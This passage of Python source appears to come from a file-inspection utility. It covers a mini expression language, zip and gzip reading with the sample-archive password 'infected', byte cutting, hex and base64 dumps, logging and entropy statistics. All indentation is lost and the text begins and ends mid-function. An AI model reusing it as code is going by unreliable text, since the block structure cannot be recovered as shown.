words = ['lorem', 'ipsum', 'dolor', 'sit', 'amet', 'consectetur', 'adipiscing', 'elit', 'etiam', 'tortor', 'metus', 'cursus', 'sed', 'sollicitudin', 'ac', 'sagittis', 'eget', 'massa', 'praesent', 'sem', 'fermentum', 'dignissim', 'in', 'vel', 'augue', 'scelerisque', 'auctor', 'libero', 'nam', 'a', 'gravida', 'odio', 'duis', 'vestibulum', 'vulputate', 'quam', 'nec', 'cras', 'nibh', 'feugiat', 'ut', 'vitae', 'ornare', 'justo', 'orci', 'varius', 'natoque', 'penatibus', 'et', 'magnis', 'dis', 'parturient', 'montes', 'nascetur', 'ridiculus', 'mus', 'curabitur', 'nisl', 'egestas', 'urna', 'iaculis', 'lectus', 'maecenas', 'ultrices', 'velit', 'eu', 'porta', 'hac', 'habitasse', 'platea', 'dictumst', 'integer', 'id', 'commodo', 'mauris', 'interdum', 'malesuada', 'fames', 'ante', 'primis', 'faucibus', 'accumsan', 'pharetra', 'aliquam', 'nunc', 'at', 'est', 'non', 'leo', 'nulla', 'sodales', 'porttitor', 'facilisis', 'aenean', 'condimentum', 'rutrum', 'facilisi', 'tincidunt', 'laoreet', 'ultricies', 'neque', 'diam', 'euismod', 'consequat', 'tempor', 'elementum', 'lobortis', 'erat', 'ligula', 'risus', 'donec', 'phasellus', 'quisque', 'vivamus', 'pellentesque', 'tristique', 'venenatis', 'purus', 'mi', 'dictum', 'posuere', 'fringilla', 'quis', 'magna', 'pretium', 'felis', 'pulvinar', 'lacinia', 'proin', 'viverra', 'lacus', 'suscipit', 'aliquet', 'dui', 'molestie', 'dapibus', 'mollis', 'suspendisse', 'sapien', 'blandit', 'morbi', 'tellus', 'enim', 'maximus', 'semper', 'arcu', 'bibendum', 'convallis', 'hendrerit', 'imperdiet', 'finibus', 'fusce', 'congue', 'ullamcorper', 'placerat', 'nullam', 'eros', 'habitant', 'senectus', 'netus', 'turpis', 'luctus', 'volutpat', 'rhoncus', 'mattis', 'nisi', 'ex', 'tempus', 'eleifend', 'vehicula', 'class', 'aptent', 'taciti', 'sociosqu', 'ad', 'litora', 'torquent', 'per', 'conubia', 'nostra', 'inceptos', 'himenaeos']
sample = random.sample(words, random.randint(minimum, maximum))
sample[0] = sample[0].capitalize()
return ' '.join(sample) + '.'
def LoremIpsum(sentences):
return ' '.join([LoremIpsumSentence(15, 30) for i in range(sentences)])
STATE_START = 0
STATE_IDENTIFIER = 1
STATE_STRING = 2
STATE_SPECIAL_CHAR = 3
STATE_ERROR = 4
FUNCTIONNAME_REPEAT = 'repeat'
FUNCTIONNAME_RANDOM = 'random'
FUNCTIONNAME_CHR = 'chr'
FUNCTIONNAME_LOREMIPSUM = 'loremipsum'
def Tokenize(expression):
result = []
token = ''
state = STATE_START
while expression != '':
char = expression[0]
expression = expression[1:]
if char == "'":
if state == STATE_START:
state = STATE_STRING
elif state == STATE_IDENTIFIER:
result.append([STATE_IDENTIFIER, token])
state = STATE_STRING
token = ''
elif state == STATE_STRING:
result.append([STATE_STRING, token])
state = STATE_START
token = ''
elif char >= '0' and char <= '9' or char.lower() >= 'a' and char.lower() <= 'z':
if state == STATE_START:
token = char
state = STATE_IDENTIFIER
else:
token += char
elif char == ' ':
if state == STATE_IDENTIFIER:
result.append([STATE_IDENTIFIER, token])
token = ''
state = STATE_START
elif state == STATE_STRING:
token += char
else:
if state == STATE_IDENTIFIER:
result.append([STATE_IDENTIFIER, token])
token = ''
state = STATE_START
result.append([STATE_SPECIAL_CHAR, char])
elif state == STATE_STRING:
token += char
else:
result.append([STATE_SPECIAL_CHAR, char])
token = ''
if state == STATE_IDENTIFIER:
result.append([state, token])
elif state == STATE_STRING:
result = [[STATE_ERROR, 'Error: string not closed', token]]
return result
def ParseFunction(tokens):
if len(tokens) == 0:
print('Parsing error')
return None, tokens
if tokens[0][0] == STATE_STRING or tokens[0][0] == STATE_IDENTIFIER and tokens[0][1].startswith('0x'):
return [[FUNCTIONNAME_REPEAT, [[STATE_IDENTIFIER, '1'], tokens[0]]], tokens[1:]]
if tokens[0][0] != STATE_IDENTIFIER:
print('Parsing error')
return None, tokens
function = tokens[0][1]
tokens = tokens[1:]
if len(tokens) == 0:
print('Parsing error')
return None, tokens
if tokens[0][0] != STATE_SPECIAL_CHAR or tokens[0][1] != '(':
print('Parsing error')
return None, tokens
tokens = tokens[1:]
if len(tokens) == 0:
print('Parsing error')
return None, tokens
arguments = []
while True:
if tokens[0][0] != STATE_IDENTIFIER and tokens[0][0] != STATE_STRING:
print('Parsing error')
return None, tokens
arguments.append(tokens[0])
tokens = tokens[1:]
if len(tokens) == 0:
print('Parsing error')
return None, tokens
if tokens[0][0] != STATE_SPECIAL_CHAR or (tokens[0][1] != ',' and tokens[0][1] != ')'):
print('Parsing error')
return None, tokens
if tokens[0][0] == STATE_SPECIAL_CHAR and tokens[0][1] == ')':
tokens = tokens[1:]
break
tokens = tokens[1:]
if len(tokens) == 0:
print('Parsing error')
return None, tokens
return [[function, arguments], tokens]
def Parse(expression):
tokens = Tokenize(expression)
if len(tokens) == 0:
print('Parsing error')
return None
if tokens[0][0] == STATE_ERROR:
print(tokens[0][1])
print(tokens[0][2])
print(expression)
return None
functioncalls = []
while True:
functioncall, tokens = ParseFunction(tokens)
if functioncall == None:
return None
functioncalls.append(functioncall)
if len(tokens) == 0:
return functioncalls
if tokens[0][0] != STATE_SPECIAL_CHAR or tokens[0][1] != '+':
print('Parsing error')
return None
tokens = tokens[1:]
def InterpretInteger(token):
if token[0] != STATE_IDENTIFIER:
return None
try:
return int(token[1])
except:
return None
def Hex2Bytes(hexadecimal):
if len(hexadecimal) % 2 == 1:
hexadecimal = '0' + hexadecimal
try:
return binascii.a2b_hex(hexadecimal)
except:
return None
def InterpretHexInteger(token):
if token[0] != STATE_IDENTIFIER:
return None
if not token[1].startswith('0x'):
return None
bytes = Hex2Bytes(token[1][2:])
if bytes == None:
return None
integer = 0
for byte in bytes:
integer = integer * 0x100 + C2IIP2(byte)
return integer
def InterpretNumber(token):
number = InterpretInteger(token)
if number == None:
return InterpretHexInteger(token)
else:
return number
def InterpretBytes(token):
if token[0] == STATE_STRING:
return token[1]
if token[0] != STATE_IDENTIFIER:
return None
if not token[1].startswith('0x'):
return None
return Hex2Bytes(token[1][2:])
def CheckFunction(functionname, arguments, countarguments, maxcountarguments=None):
if maxcountarguments == None:
if countarguments == 0 and len(arguments) != 0:
print('Error: function %s takes no arguments, %d are given' % (functionname, len(arguments)))
return True
if countarguments == 1 and len(arguments) != 1:
print('Error: function %s takes 1 argument, %d are given' % (functionname, len(arguments)))
return True
if countarguments != len(arguments):
print('Error: function %s takes %d arguments, %d are given' % (functionname, countarguments, len(arguments)))
return True
else:
if len(arguments) < countarguments or len(arguments) > maxcountarguments:
print('Error: function %s takes between %d and %d arguments, %d are given' % (functionname, countarguments, maxcountarguments, len(arguments)))
return True
return False
def CheckNumber(argument, minimum=None, maximum=None):
number = InterpretNumber(argument)
if number == None:
print('Error: argument should be a number: %s' % argument[1])
return None
if minimum != None and number < minimum:
print('Error: argument should be minimum %d: %d' % (minimum, number))
return None
if maximum != None and number > maximum:
print('Error: argument should be maximum %d: %d' % (maximum, number))
return None
return number
def Interpret(expression):
functioncalls = Parse(expression)
if functioncalls == None:
return None
decoded = ''
for functioncall in functioncalls:
functionname, arguments = functioncall
if functionname == FUNCTIONNAME_REPEAT:
if CheckFunction(functionname, arguments, 2):
return None
number = CheckNumber(arguments[0], minimum=1)
if number == None:
return None
bytes = InterpretBytes(arguments[1])
if bytes == None:
print('Error: argument should be a byte sequence: %s' % arguments[1][1])
return None
decoded += number * bytes
elif functionname == FUNCTIONNAME_RANDOM:
if CheckFunction(functionname, arguments, 1):
return None
number = CheckNumber(arguments[0], minimum=1)
if number == None:
return None
decoded += ''.join([chr(random.randint(0, 255)) for x in range(number)])
elif functionname == FUNCTIONNAME_LOREMIPSUM:
if CheckFunction(functionname, arguments, 1):
return None
number = CheckNumber(arguments[0], minimum=1)
if number == None:
return None
decoded += LoremIpsum(number)
elif functionname == FUNCTIONNAME_CHR:
if CheckFunction(functionname, arguments, 1, 2):
return None
number = CheckNumber(arguments[0], minimum=1, maximum=255)
if number == None:
return None
if len(arguments) == 1:
decoded += chr(number)
else:
number2 = CheckNumber(arguments[1], minimum=1, maximum=255)
if number2 == None:
return None
if number < number2:
decoded += ''.join([chr(n) for n in range(number, number2 + 1)])
else:
decoded += ''.join([chr(n) for n in range(number, number2 - 1, -1)])
else:
print('Error: unknown function: %s' % functionname)
return None
return decoded
FCH_FILENAME = 0
FCH_DATA = 1
FCH_ERROR = 2
def FilenameCheckHash(filename, literalfilename):
if literalfilename:
return FCH_FILENAME, filename
elif filename.startswith('#h#'):
result = Hex2Bytes(filename[3:])
if result == None:
return FCH_ERROR, 'hexadecimal'
else:
return FCH_DATA, result
elif filename.startswith('#b#'):
try:
return FCH_DATA, binascii.a2b_base64(filename[3:])
except:
return FCH_ERROR, 'base64'
elif filename.startswith('#e#'):
result = Interpret(filename[3:])
if result == None:
return FCH_ERROR, 'expression'
else:
return FCH_DATA, result
elif filename.startswith('#'):
return FCH_DATA, C2BIP3(filename[1:])
else:
return FCH_FILENAME, filename
def AnalyzeFileError(filename):
PrintError('Error opening file %s' % filename)
PrintError(sys.exc_info()[1])
try:
if not os.path.exists(filename):
PrintError('The file does not exist')
elif os.path.isdir(filename):
PrintError('The file is a directory')
elif not os.path.isfile(filename):
PrintError('The file is not a regular file')
except:
pass
def CreateZipFileObject(arg1, arg2):
if 'AESZipFile' in dir(zipfile):
return zipfile.AESZipFile(arg1, arg2)
else:
return zipfile.ZipFile(arg1, arg2)
class cBinaryFile:
def __init__(self, filename, zippassword='infected', noextraction=False, literalfilename=False):
self.filename = filename
self.zippassword = zippassword
self.noextraction = noextraction
self.literalfilename = literalfilename
self.oZipfile = None
self.extracted = False
self.fIn = None
fch, data = FilenameCheckHash(self.filename, self.literalfilename)
if fch == FCH_ERROR:
line = 'Error %s parsing filename: %s' % (data, self.filename)
raise Exception(line)
try:
if self.filename == '':
if sys.platform == 'win32':
import msvcrt
msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
self.fIn = sys.stdin
elif fch == FCH_DATA:
self.fIn = DataIO(data)
elif not self.noextraction and self.filename.lower().endswith('.zip'):
self.oZipfile = CreateZipFileObject(self.filename, 'r')
if len(self.oZipfile.infolist()) == 1:
self.fIn = self.oZipfile.open(self.oZipfile.infolist()[0], 'r', self.zippassword)
self.extracted = True
else:
self.oZipfile.close()
self.oZipfile = None
self.fIn = open(self.filename, 'rb')
elif not self.noextraction and self.filename.lower().endswith('.gz'):
self.fIn = gzip.GzipFile(self.filename, 'rb')
self.extracted = True
else:
self.fIn = open(self.filename, 'rb')
except:
AnalyzeFileError(self.filename)
raise
def close(self):
if self.fIn != sys.stdin and self.fIn != None:
self.fIn.close()
if self.oZipfile != None:
self.oZipfile.close()
def read(self, size=None):
try:
fRead = self.fIn.buffer
except:
fRead = self.fIn
if size == None:
return fRead.read()
else:
return fRead.read(size)
def Data(self):
data = self.read()
self.close()
return data
#-ENDCODE cBinaryFile--------------------------------------------------------------------------------
def File2Strings(filename):
try:
if filename == '':
f = sys.stdin
else:
f = open(filename, 'r')
except:
return None
try:
return map(lambda line:line.rstrip('\n'), f.readlines())
except:
return None
finally:
if f != sys.stdin:
f.close()
def File2String(filename):
try:
f = open(filename, 'rb')
except:
return None
try:
return f.read()
except:
return None
finally:
f.close()
def ProcessAt(argument):
if argument.startswith('@'):
strings = File2Strings(argument[1:])
if strings == None:
raise Exception('Error reading %s' % argument)
else:
return strings
else:
return [argument]
def Glob(filename):
filenames = glob.glob(filename)
if len(filenames) == 0:
return [filename]
else:
return filenames
class cExpandFilenameArguments():
def __init__(self, filenames, literalfilenames=False, recursedir=False, checkfilenames=False, expressionprefix=None, flagprefix=None):
self.containsUnixShellStyleWildcards = False
self.warning = False
self.message = ''
self.filenameexpressionsflags = []
self.expressionprefix = expressionprefix
self.flagprefix = flagprefix
self.literalfilenames = literalfilenames
expression = ''
flag = ''
if len(filenames) == 0:
self.filenameexpressionsflags = [['', '', '']]
elif literalfilenames:
self.filenameexpressionsflags = [[filename, '', ''] for filename in filenames]
elif recursedir:
for dirwildcard in filenames:
if expressionprefix != None and dirwildcard.startswith(expressionprefix):
expression = dirwildcard[len(expressionprefix):]
elif flagprefix != None and dirwildcard.startswith(flagprefix):
flag = dirwildcard[len(flagprefix):]
else:
if dirwildcard.startswith('@'):
for filename in ProcessAt(dirwildcard):
self.filenameexpressionsflags.append([filename, expression, flag])
elif os.path.isfile(dirwildcard):
self.filenameexpressionsflags.append([dirwildcard, expression, flag])
else:
if os.path.isdir(dirwildcard):
dirname = dirwildcard
basename = '*'
else:
dirname, basename = os.path.split(dirwildcard)
if dirname == '':
dirname = '.'
for path, dirs, files in os.walk(dirname):
for filename in fnmatch.filter(files, basename):
self.filenameexpressionsflags.append([os.path.join(path, filename), expression, flag])
else:
for filename in list(collections.OrderedDict.fromkeys(sum(map(self.Glob, sum(map(ProcessAt, filenames), [])), []))):
if expressionprefix != None and filename.startswith(expressionprefix):
expression = filename[len(expressionprefix):]
elif flagprefix != None and filename.startswith(flagprefix):
flag = filename[len(flagprefix):]
else:
self.filenameexpressionsflags.append([filename, expression, flag])
self.warning = self.containsUnixShellStyleWildcards and len(self.filenameexpressionsflags) == 0
if self.warning:
self.message = "Your filename argument(s) contain Unix shell-style wildcards, but no files were matched.\nCheck your wildcard patterns or use option literalfilenames if you don't want wildcard pattern matching."
return
if self.filenameexpressionsflags == [] and (expression != '' or flag != ''):
self.filenameexpressionsflags = [['', expression, flag]]
if checkfilenames:
self.CheckIfFilesAreValid()
def Glob(self, filename):
if not ('?' in filename or '*' in filename or ('[' in filename and ']' in filename)):
return [filename]
self.containsUnixShellStyleWildcards = True
return glob.glob(filename)
def CheckIfFilesAreValid(self):
valid = []
doesnotexist = []
isnotafile = []
for filename, expression, flag in self.filenameexpressionsflags:
hashfile = False
try:
hashfile = FilenameCheckHash(filename, self.literalfilenames)[0] == FCH_DATA
except:
pass
if filename == '' or hashfile:
valid.append([filename, expression, flag])
elif not os.path.exists(filename):
doesnotexist.append(filename)
elif not os.path.isfile(filename):
isnotafile.append(filename)
else:
valid.append([filename, expression, flag])
self.filenameexpressionsflags = valid
if len(doesnotexist) > 0:
self.warning = True
self.message += 'The following files do not exist and will be skipped: ' + ' '.join(doesnotexist) + '\n'
if len(isnotafile) > 0:
self.warning = True
self.message += 'The following files are not regular files and will be skipped: ' + ' '.join(isnotafile) + '\n'
def Filenames(self):
if self.expressionprefix == None:
return [filename for filename, expression, flag in self.filenameexpressionsflags]
else:
return self.filenameexpressionsflags
def CheckJSON(stringJSON):
try:
object = json.loads(stringJSON)
except:
print('Error parsing JSON')
print(sys.exc_info()[1])
return None
if not isinstance(object, dict):
print('Error JSON is not a dictionary')
return None
if not 'version' in object:
print('Error JSON dictionary has no version')
return None
if object['version'] != 2:
print('Error JSON dictionary has wrong version')
return None
if not 'id' in object:
print('Error JSON dictionary has no id')
return None
if object['id'] != 'didierstevens.com':
print('Error JSON dictionary has wrong id')
return None
if not 'type' in object:
print('Error JSON dictionary has no type')
return None
if object['type'] != 'content':
print('Error JSON dictionary has wrong type')
return None
if not 'fields' in object:
print('Error JSON dictionary has no fields')
return None
if not 'name' in object['fields']:
print('Error JSON dictionary has no name field')
return None
if not 'content' in object['fields']:
print('Error JSON dictionary has no content field')
return None
if not 'items' in object:
print('Error JSON dictionary has no items')
return None
for item in object['items']:
item['content'] = binascii.a2b_base64(item['content'])
return object['items']
CUTTERM_NOTHING = 0
CUTTERM_POSITION = 1
CUTTERM_FIND = 2
CUTTERM_LENGTH = 3
def Replace(string, dReplacements):
if string in dReplacements:
return dReplacements[string]
else:
return string
def ParseInteger(argument):
sign = 1
if argument.startswith('+'):
argument = argument[1:]
elif argument.startswith('-'):
argument = argument[1:]
sign = -1
if argument.startswith('0x'):
return sign * int(argument[2:], 16)
else:
return sign * int(argument)
def ParseCutTerm(argument):
if argument == '':
return CUTTERM_NOTHING, None, ''
oMatch = re.match(r'\-?0x([0-9a-f]+)', argument, re.I)
if oMatch == None:
oMatch = re.match(r'\-?(\d+)', argument)
else:
value = int(oMatch.group(1), 16)
if argument.startswith('-'):
value = -value
return CUTTERM_POSITION, value, argument[len(oMatch.group(0)):]
if oMatch == None:
oMatch = re.match(r'\[([0-9a-f]+)\](\d+)?([+-](?:0x[0-9a-f]+|\d+))?', argument, re.I)
else:
value = int(oMatch.group(1))
if argument.startswith('-'):
value = -value
return CUTTERM_POSITION, value, argument[len(oMatch.group(0)):]
if oMatch == None:
oMatch = re.match(r"\[u?\'(.+?)\'\](\d+)?([+-](?:0x[0-9a-f]+|\d+))?", argument)
else:
if len(oMatch.group(1)) % 2 == 1:
raise Exception("Uneven length hexadecimal string")
else:
return CUTTERM_FIND, (binascii.a2b_hex(oMatch.group(1)), int(Replace(oMatch.group(2), {None: '1'})), ParseInteger(Replace(oMatch.group(3), {None: '0'}))), argument[len(oMatch.group(0)):]
if oMatch == None:
return None, None, argument
else:
if argument.startswith("[u'"):
# convert ascii to unicode 16 byte sequence
searchtext = oMatch.group(1).decode('unicode_escape').encode('utf16')[2:]
else:
searchtext = oMatch.group(1)
return CUTTERM_FIND, (searchtext, int(Replace(oMatch.group(2), {None: '1'})), ParseInteger(Replace(oMatch.group(3), {None: '0'}))), argument[len(oMatch.group(0)):]
def ParseCutArgument(argument):
type, value, remainder = ParseCutTerm(argument.strip())
if type == CUTTERM_NOTHING:
return CUTTERM_NOTHING, None, CUTTERM_NOTHING, None
elif type == None:
if remainder.startswith(':'):
typeLeft = CUTTERM_NOTHING
valueLeft = None
remainder = remainder[1:]
else:
return None, None, None, None
else:
typeLeft = type
valueLeft = value
if typeLeft == CUTTERM_POSITION and valueLeft < 0:
return None, None, None, None
if typeLeft == CUTTERM_FIND and valueLeft[1] == 0:
return None, None, None, None
if remainder.startswith(':'):
remainder = remainder[1:]
else:
return None, None, None, None
type, value, remainder = ParseCutTerm(remainder)
if type == CUTTERM_POSITION and remainder == 'l':
return typeLeft, valueLeft, CUTTERM_LENGTH, value
elif type == None or remainder != '':
return None, None, None, None
elif type == CUTTERM_FIND and value[1] == 0:
return None, None, None, None
else:
return typeLeft, valueLeft, type, value
def Find(data, value, nth, startposition=-1):
position = startposition
while nth > 0:
position = data.find(value, position + 1)
if position == -1:
return -1
nth -= 1
return position
def CutData(stream, cutArgument):
if cutArgument == '':
return [stream, None, None]
typeLeft, valueLeft, typeRight, valueRight = ParseCutArgument(cutArgument)
if typeLeft == None:
return [stream, None, None]
if typeLeft == CUTTERM_NOTHING:
positionBegin = 0
elif typeLeft == CUTTERM_POSITION:
positionBegin = valueLeft
elif typeLeft == CUTTERM_FIND:
positionBegin = Find(stream, valueLeft[0], valueLeft[1])
if positionBegin == -1:
return ['', None, None]
positionBegin += valueLeft[2]
else:
raise Exception("Unknown value typeLeft")
if typeRight == CUTTERM_NOTHING:
positionEnd = len(stream)
elif typeRight == CUTTERM_POSITION and valueRight < 0:
positionEnd = len(stream) + valueRight
elif typeRight == CUTTERM_POSITION:
positionEnd = valueRight + 1
elif typeRight == CUTTERM_LENGTH:
positionEnd = positionBegin + valueRight
elif typeRight == CUTTERM_FIND:
positionEnd = Find(stream, valueRight[0], valueRight[1], positionBegin)
if positionEnd == -1:
return ['', None, None]
else:
positionEnd += len(valueRight[0])
positionEnd += valueRight[2]
else:
raise Exception("Unknown value typeRight")
return [stream[positionBegin:positionEnd], positionBegin, positionEnd]
#-BEGINCODE cDump------------------------------------------------------------------------------------
#import binascii
#import sys
#if sys.version_info[0] >= 3:
# from io import StringIO
#else:
# from cStringIO import StringIO
class cDump():
def __init__(self, data, prefix='', offset=0, dumplinelength=16):
self.data = data
self.prefix = prefix
self.offset = offset
self.dumplinelength = dumplinelength
def HexDump(self):
oDumpStream = self.cDumpStream(self.prefix)
hexDump = ''
for i, b in enumerate(self.data):
if i % self.dumplinelength == 0 and hexDump != '':
oDumpStream.Addline(hexDump)
hexDump = ''
hexDump += IFF(hexDump == '', '', ' ') + '%02X' % self.C2IIP2(b)
oDumpStream.Addline(hexDump)
return oDumpStream.Content()
def CombineHexAscii(self, hexDump, asciiDump):
if hexDump == '':
return ''
countSpaces = 3 * (self.dumplinelength - len(asciiDump))
if len(asciiDump) <= self.dumplinelength / 2:
countSpaces += 1
return hexDump + ' ' + (' ' * countSpaces) + asciiDump
def HexAsciiDump(self, rle=False):
oDumpStream = self.cDumpStream(self.prefix)
position = ''
hexDump = ''
asciiDump = ''
previousLine = None
countRLE = 0
for i, b in enumerate(self.data):
b = self.C2IIP2(b)
if i % self.dumplinelength == 0:
if hexDump != '':
line = self.CombineHexAscii(hexDump, asciiDump)
if not rle or line != previousLine:
if countRLE > 0:
oDumpStream.Addline('* %d 0x%02x' % (countRLE, countRLE * self.dumplinelength))
oDumpStream.Addline(position + line)
countRLE = 0
else:
countRLE += 1
previousLine = line
position = '%08X:' % (i + self.offset)
hexDump = ''
asciiDump = ''
if i % self.dumplinelength == self.dumplinelength / 2:
hexDump += ' '
hexDump += ' %02X' % b
asciiDump += IFF(b >= 32 and b < 128, chr(b), '.')
if countRLE > 0:
oDumpStream.Addline('* %d 0x%02x' % (countRLE, countRLE * self.dumplinelength))
oDumpStream.Addline(self.CombineHexAscii(position + hexDump, asciiDump))
return oDumpStream.Content()
def Base64Dump(self, nowhitespace=False):
encoded = binascii.b2a_base64(self.data)
if nowhitespace:
return encoded
encoded = encoded.strip()
oDumpStream = self.cDumpStream(self.prefix)
length = 64
for i in range(0, len(encoded), length):
oDumpStream.Addline(encoded[0+i:length+i])
return oDumpStream.Content()
class cDumpStream():
def __init__(self, prefix=''):
self.oStringIO = StringIO()
self.prefix = prefix
def Addline(self, line):
if line != '':
self.oStringIO.write(self.prefix + line + '\n')
def Content(self):
return self.oStringIO.getvalue()
@staticmethod
def C2IIP2(data):
if sys.version_info[0] > 2:
return data
else:
return ord(data)
#-ENDCODE cDump--------------------------------------------------------------------------------------
def IfWIN32SetBinary(io):
if sys.platform == 'win32':
import msvcrt
msvcrt.setmode(io.fileno(), os.O_BINARY)
#Fix for http://bugs.python.org/issue11395
def StdoutWriteChunked(data):
if sys.version_info[0] > 2:
sys.stdout.buffer.write(data)
else:
while data != '':
sys.stdout.write(data[0:10000])
try:
sys.stdout.flush()
except IOError:
return
data = data[10000:]
class cVariables():
def __init__(self, variablesstring='', separator=DEFAULT_SEPARATOR):
self.dVariables = {}
if variablesstring == '':
return
for variable in variablesstring.split(separator):
name, value = VariableNameValue(variable)
self.dVariables[name] = value
def SetVariable(self, name, value):
self.dVariables[name] = value
def Instantiate(self, astring):
for key, value in self.dVariables.items():
astring = astring.replace('%' + key + '%', value)
return astring
class cOutput():
def __init__(self, filenameOption=None):
self.starttime = time.time()
self.filenameOption = filenameOption
self.separateFiles = False
self.progress = False
self.console = False
self.head = False
self.headCounter = 0
self.tail = False
self.tailQueue = []
self.fOut = None
self.rootFilenames = {}
if self.filenameOption:
if self.ParseHash(self.filenameOption):
if not self.separateFiles and self.filename != '':
self.fOut = open(self.filename, 'w')
elif self.filenameOption != '':
self.fOut = open(self.filenameOption, 'w')
self.dReplacements = {}
def Replace(self, line):
for key, value in self.dReplacements.items():
line = line.replace(key, value)
return line
def ParseHash(self, option):
if option.startswith('#'):
position = self.filenameOption.find('#', 1)
if position > 1:
switches = self.filenameOption[1:position]
self.filename = self.filenameOption[position + 1:]
for switch in switches:
if switch == 's':
self.separateFiles = True
elif switch == 'p':
self.progress = True
elif switch == 'c':
self.console = True
elif switch == 'l':
pass
elif switch == 'g':
if self.filename != '':
extra = self.filename + '-'
else:
extra = ''
self.filename = '%s-%s%s.txt' % (os.path.splitext(os.path.basename(sys.argv[0]))[0], extra, self.FormatTime())
elif switch == 'h':
self.head = True
elif switch == 't':
self.tail = True
else:
return False
return True
return False
@staticmethod
def FormatTime(epoch=None):
if epoch == None:
epoch = time.time()
return '%04d%02d%02d-%02d%02d%02d' % time.localtime(epoch)[0:6]
def RootUnique(self, root):
if not root in self.rootFilenames:
self.rootFilenames[root] = None
return root
iter = 1
while True:
newroot = '%s_%04d' % (root, iter)
if not newroot in self.rootFilenames:
self.rootFilenames[newroot] = None
return newroot
iter += 1
def LineSub(self, line, eol):
line = self.Replace(line)
if self.fOut == None or self.console:
try:
print(line, end=eol)
except UnicodeEncodeError:
encoding = sys.stdout.encoding
print(line.encode(encoding, errors='backslashreplace').decode(encoding), end=eol)
# sys.stdout.flush()
if self.fOut != None:
self.fOut.write(line + '\n')
self.fOut.flush()
def Line(self, line, eol='\n'):
if self.head:
if self.headCounter < 10:
self.LineSub(line, eol)
elif self.tail:
self.tailQueue = self.tailQueue[-9:] + [[line, eol]]
self.headCounter += 1
elif self.tail:
self.tailQueue = self.tailQueue[-9:] + [[line, eol]]
else:
self.LineSub(line, eol)
def LineTimestamped(self, line):
self.Line('%s: %s' % (self.FormatTime(), line))
def Filename(self, filename, index, total):
self.separateFilename = filename
if self.progress:
if index == 0:
eta = ''
else:
seconds = int(float((time.time() - self.starttime) / float(index)) * float(total - index))
eta = 'estimation %d seconds left, finished %s ' % (seconds, self.FormatTime(time.time() + seconds))
PrintError('%d/%d %s%s' % (index + 1, total, eta, self.separateFilename))
if self.separateFiles and self.filename != '':
oFilenameVariables = cVariables()
oFilenameVariables.SetVariable('f', self.separateFilename)
basename = os.path.basename(self.separateFilename)
oFilenameVariables.SetVariable('b', basename)
oFilenameVariables.SetVariable('d', os.path.dirname(self.separateFilename))
root, extension = os.path.splitext(basename)
oFilenameVariables.SetVariable('r', root)
oFilenameVariables.SetVariable('ru', self.RootUnique(root))
oFilenameVariables.SetVariable('e', extension)
self.Close()
self.fOut = open(oFilenameVariables.Instantiate(self.filename), 'w')
def Close(self):
if self.head and self.tail and len(self.tailQueue) > 0:
self.LineSub('...', '\n')
for line, eol in self.tailQueue:
self.LineSub(line, eol)
self.headCounter = 0
self.tailQueue = []
if self.fOut != None:
self.fOut.close()
self.fOut = None
def ToString(value):
if isinstance(value, str):
return value
else:
return str(value)
def Quote(value, separator, quote):
value = ToString(value)
if len(value) > 1 and value[0] == quote and value[-1] == quote:
return value
if separator in value or value == '':
return quote + value + quote
else:
return value
def MakeCSVLine(row, separator=',', quote='"'):
return separator.join([Quote(value, separator, quote) for value in row])
class cLogfile():
def __init__(self, keyword, comment):
self.starttime = time.time()
self.errors = 0
if keyword == '':
self.oOutput = None
else:
self.oOutput = cOutput('%s-%s-%s.log' % (os.path.splitext(os.path.basename(sys.argv[0]))[0], keyword, self.FormatTime()))
self.Line('Start')
self.Line('UTC', '%04d%02d%02d-%02d%02d%02d' % time.gmtime(time.time())[0:6])
self.Line('Comment', comment)
self.Line('Args', repr(sys.argv))
self.Line('Version', __version__)
self.Line('Python', repr(sys.version_info))
self.Line('Platform', sys.platform)
self.Line('CWD', repr(os.getcwd()))
@staticmethod
def FormatTime(epoch=None):
if epoch == None:
epoch = time.time()
return '%04d%02d%02d-%02d%02d%02d' % time.localtime(epoch)[0:6]
def Line(self, *line):
if self.oOutput != None:
self.oOutput.Line(MakeCSVLine((self.FormatTime(), ) + line, DEFAULT_SEPARATOR, QUOTE))
def LineError(self, *line):
self.Line('Error', *line)
self.errors += 1
def Close(self):
if self.oOutput != None:
self.Line('Finish', '%d error(s)' % self.errors, '%d second(s)' % (time.time() - self.starttime))
self.oOutput.Close()
def CalculateByteStatistics(dPrevalence=None, data=None):
averageConsecutiveByteDifference = None
if dPrevalence == None:
dPrevalence = {iter: 0 for iter in range(0x100)}
sumDifferences = 0.0
previous = None
if len(data) > 1:
for byte in data:
byte = C2IIP2(byte)
dPrevalence[byte] += 1
if previous != None:
sumDifferences += abs(byte - previous)
previous = byte
averageConsecutiveByteDifference = sumDifferences /float(len(data)-1)
sumValues = sum(dPrevalence.values())
countNullByte = dPrevalence[0]
countControlBytes = 0
countWhitespaceBytes = 0
countUniqueBytes = 0
for iter in range(1, 0x21):
if chr(iter) in string.whitespace:
countWhitespaceBytes += dPrevalence[iter]
else:
countControlBytes += dPrevalence[iter]
countControlBytes += dPrevalence[0x7F]
countPrintableBytes = 0
for iter in range(0x21, 0x7F):
countPrintableBytes += dPrevalence[iter]
countHighBytes = 0
for iter in range(0x80, 0x100):
countHighBytes += dPrevalence[iter]
countHexadecimalBytes = 0
countBASE64Bytes = 0
for iter in range(0x30, 0x3A):
countHexadecimalBytes += dPrevalence[iter]
countBASE64Bytes += dPrevalence[iter]
for iter in range(0x41, 0x47):
countHexadecimalBytes += dPrevalence[iter]
for iter in range(0x61, 0x67):
countHexadecimalBytes += dPrevalence[iter]
for iter in range(0x41, 0x5B):
countBASE64Bytes += dPrevalence[iter]
for iter in range(0x61, 0x7B):
countBASE64Bytes += dPrevalence[iter]
countBASE64Bytes += dPrevalence[ord('+')] + dPrevalence[ord('/')] + dPrevalence[ord('=')]
entropy = 0.0
for iter in range(0x100):
if dPrevalence[iter] > 0:
prevalence = float(dPrevalence[iter]) / float(sumValues)
entropy += - prevalence * math.log(prevalence, 2)
countUniqueBytes += 1
return sumValues, entropy, countUniqueBytes, countNullByte, countControlBytes, countWhitespaceBytes, countPrintableBytes, countHighBytes, countHexadecimalBytes, countBASE64Bytes, averageConsecutiveByteDifference
def GetChunk(position, data):
return [data[:position], data[position:]]
def InstantiateCOutput(options):
filenameOption = None
if options.output != '':
filenameOption = options.output
return cOutput(filenameOption)
class UnpackErrorNotEnoughData(Exception):
pass
def Unpack(format, data):
size = struct.calcsize(format)
if len(data) < size:
raise UnpackErrorNotEnoughData()
